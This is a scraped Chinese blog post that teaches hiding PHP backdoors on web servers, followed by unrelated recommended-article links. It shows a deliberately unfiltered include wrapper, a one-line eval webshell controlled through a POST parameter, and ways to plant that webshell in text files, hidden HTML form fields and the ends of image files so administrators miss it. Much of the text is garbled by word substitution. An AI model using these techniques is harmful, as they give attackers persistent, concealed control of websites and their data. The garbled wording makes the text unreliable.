lanker php 大码,松哥教你 隐藏PHP文件后门的技巧
松哥教你 隐藏PHP文件后门的技巧
(2011-12-25 19:40:52)
标签:
it
分类:
php
要知道假如光把PHP语句放到图片里是无论如何也不能履行的,由于PHP只解析扩大名为php的文件。所以说要能使暗躲在图片里的PHP语句履行。我们就的借助PHP中的调用函数
:include 、require 等。
我们还记得前些日子把木马暗躲到图片的文章吧。也就是在PHP文件里用include('x.gif')这样的语句来调用暗躲在图片的木马语句。ASP
中语句也类似。看似非常隐躲但直接调用图片对稍微懂点PHP的人就不难发明可疑之处。由于URL
里用GET方法很难传递参数,这就使得插进木马的性能得不到施展。
include
函数在PHP中应用的比拟频繁,所以引起的安全标题也实在太多,例如PHPWIND1.36的漏洞就是由于include后面的变量没做过滤引起的。由此
我们就可以结构类似的语句来插进到PHP文件中。然后把木马暗躲到图片或HTML文件里,可以说隐躲性就更高了。如在PHPWIND论坛里插进下面的语
句:<‘’?@include includ/.$PHPWIND_ROOT;? <mailto:?@include
'includ/'.$PHPWIND_ROOT;?>> 一般治理员是无法看出来的。
有了include 函数来帮助帮忙我们就可以把PHP木马暗躲到 诸如
txt、html和图片文件等很多类型的文件里来了。由于txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
首先建立一PHP文件test.php 文件内容为:
<?php
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件一般都是阐明文件,所以我们把一句话木马放到目录的阐明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马
<?eval_r($_POST[cmd]);?>粘贴到t.txt文件里。然后拜访
http://localhost/test/test.php?test=../t.txt
<http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt>
假如你看到t.txt的内容就证实Ok了, 然后把在lanker微型PHP后门客户端 木马地址添进
http://localhost/test/test.php?test=../t.txt
<http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt>
密码里添进cmd就可以了,履行返回的成果都可以看到。
对于HTML的文件,一般都为模版文件。为了使插进到HTML的文件的木马
能被调用履行而且不被显示出来,我们可以在HTML里参加一个暗躲属性的文本框 ,如:<input type=hidden
value='<?eval_r($_POST[cmd]);?>'> 然后应用方法同上。履行的返回成果一般都可以查看源文件看到。
如应用查看本程序目录功效。查看源文件内容为 <input type=hidden
value='C:\Uniserver2_7s\www\test'> 我可以得到目录为
C:\Uniserver2_7s\www\test。
下面我们说说图片文件,要说最为毒的一招莫过于把木马暗躲到图片里。我们可以直接对一个图片进行编纂,把<?eval_r($_POST[cmd]);?>插进到图片末尾。
经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添进
<http://localhost/test/test.php?test=../1.jpg>
我们查看PHP环境变量 返回的是成果是原图片。
这里可能要和我们想象的成果有些差距了,实在命令已经运行了,只是返回的成果看不到
而已,由于这是真正的GIF文件,所以是不会显示返回成果的,为了证实是否真的履行了命令我们
履行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样捏造的长处是隐躲性好。毛病也自然不用说了是没回显。假如你想看到返回的成果,那就拿出
记事本捏造一个假的图片文件吧。
分享:
喜欢
0
赠金笔
加载中,请稍候......
评论加载中,请稍候...
发评论
登录名: 密码: 找回密码 注册记住登录状态
昵 称:
评论并转载此博文
发评论
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。
lanker php 大码,松哥教你 隐藏PHP文件后门的技巧相关推荐
- hexo+git+github+域名搭建个人博客提示404_不用花一分线,松哥手把手教你上线个人博客...
有不少小伙伴私信松哥,打听松哥的博客是怎么做的,其实这个我之前和大家聊过,今天就再来说一说. 我记得是 2015 年 4 月 15 在CSDN上发表了我的第一篇博客,是一个学习笔记,从那之后开启了我博 ...
- 不用花一分线,松哥手把手教你上线个人博客
上一篇:听说你的 IDEA 昨天掉链子了?松哥给你准备了大招 有不少小伙伴私信松哥,打听松哥的博客是怎么做的,其实这个我之前和大家聊过,今天就再来说一说. 我记得是 2015 年 4 月 15 在CS ...
- python秒表代码_斌哥教你自制千分秒表(键盘控制)
上节课我们绘制了用鼠标控制的千分秒表,还指出了一个隐藏的bug及其解决方案.今天我们来绘制使用键盘控制的千分秒表,请大家比较它与上节课代码的区别. 话不多说,上代码. 素材准备: 不需要任何素材,只需 ...
- 全网唯一一套labview深度学习教程:tensorflow+目标检测:龙哥教你学视觉—LabVIEW深度学习教程
全网唯一一套labview深度学习教程:tensorflow+目标检测:龙哥教你学视觉-LabVIEW深度学习教程 一.知识背景: 随着自动化技术的快速发展,在工业生产中很多需要人工操作的环节逐渐转由 ...
- Spring Boot 要怎么学?要学哪些东西?要不要先学 SSM?松哥说说看法
可能很多刚接触 Spring Boot 的小伙伴都会有这样的疑问,Spring Boot 要怎么学,要不要先学 SSM?今天结合自己的经验,和大家说一说我的看法,也顺便推荐几个 Spring Boot ...
- 猫哥教你写爬虫 046--协程-实践-吃什么不会胖
吃什么不会胖? 低热量食物 食物的数量有千千万,如果我们要爬取食物热量的话,这个数据量必然很大. 使用多协程来爬取大量的数据是非常合理且明智的选择 如果我们要爬取的话,那就得选定一个有存储食物热量信息 ...
- 猫哥教你写爬虫 006--条件判断和条件嵌套
流程控制 复仇者联盟3-无限战争(搜集宝石) python里面, 不需要使用;来结尾, 因为python是使用换行来结束一行代码的 if判断, 没有{}, python使用缩进来表示层级关系 if.. ...
- 远哥教你MuleESB系列视频教程
远哥教你MuleESB系列视频课程介绍共11个视频 1.Mule ESB介绍 2.社区版/企业版的区别和安装 3.MuleESB快速入门以及MEL和Message结构 4.官方例子讲解JMS/FTP/ ...
- 猫哥教你写爬虫 002--作业-打印皮卡丘
作业 请你使用print()函数将下面的皮卡丘打印出来, 使用三种方式 へ /|/\7 ∠_// │ / /│ Z _,< / /`ヽ│ ヽ / 〉Y ` / /イ● 、 ● ⊂⊃〈 /() へ ...
最新文章
- Ubuntu18.04安装教程及SLAM常用软件安装教程
- MATLAB实战应用案例:欧拉法、改进欧拉法、ode45求解微分方程实例
- Django 出现 “multiple primary key defined”报错
- java中乐观锁_Java中乐观锁与悲观锁的实现
- 伪类::selection自定义文本选中时的样式(CSS3样式),CSS3的word-break单次换行
- 《剑指Offer》 链表中倒数第k个结点
- freebsd配置IP
- js 验证身份证号码
- ExtJs之Ext.data.Store
- 20211109:DC综合的一些简单概念理解记录
- mpi和openmp混合编程的优点_混合云:拥抱云计算的未来!
- 最全LinuxC语言系统开发资源视频资源
- 小日历实验目的Android,Android实验报告22个.doc
- matlab gui的callback,matlab GUI callback 函数实现
- 听说你不会用Lumion做通道图?
- C#指定图片添加文字——修改版
- 【AI每日播报】马云启动NASA计划 Intel150亿美元收购Mobileye
- 数据分类分级方法及典型应用场景
- 405 (Method Not Allowed)
- elasticsearch springboot 实现分词搜索
热门文章
- Ubuntu 网页浏览器 谷歌浏览器 下载使用
- Unable to configure Windows to Trust the Fiddler Root certificate.The LOG tab may contain more infor
- SD卡格式化和删除分区
- 计算机硬件相关行业,2021年中国电脑硬件行业市场规模及发展前景预测分析(图)...
- 法大大联合清华大学法学院研讨“电子证据与劳动法”
- 1974年图灵奖--唐纳德·克努特简介
- NAN、QNAN、 SNAN、 IND、 INF
- 快递100实时查询接口C#
- 图神经网路入门(1)
- bow键盘 android,一拖三还能秒切换 BOW航世蓝牙键盘体验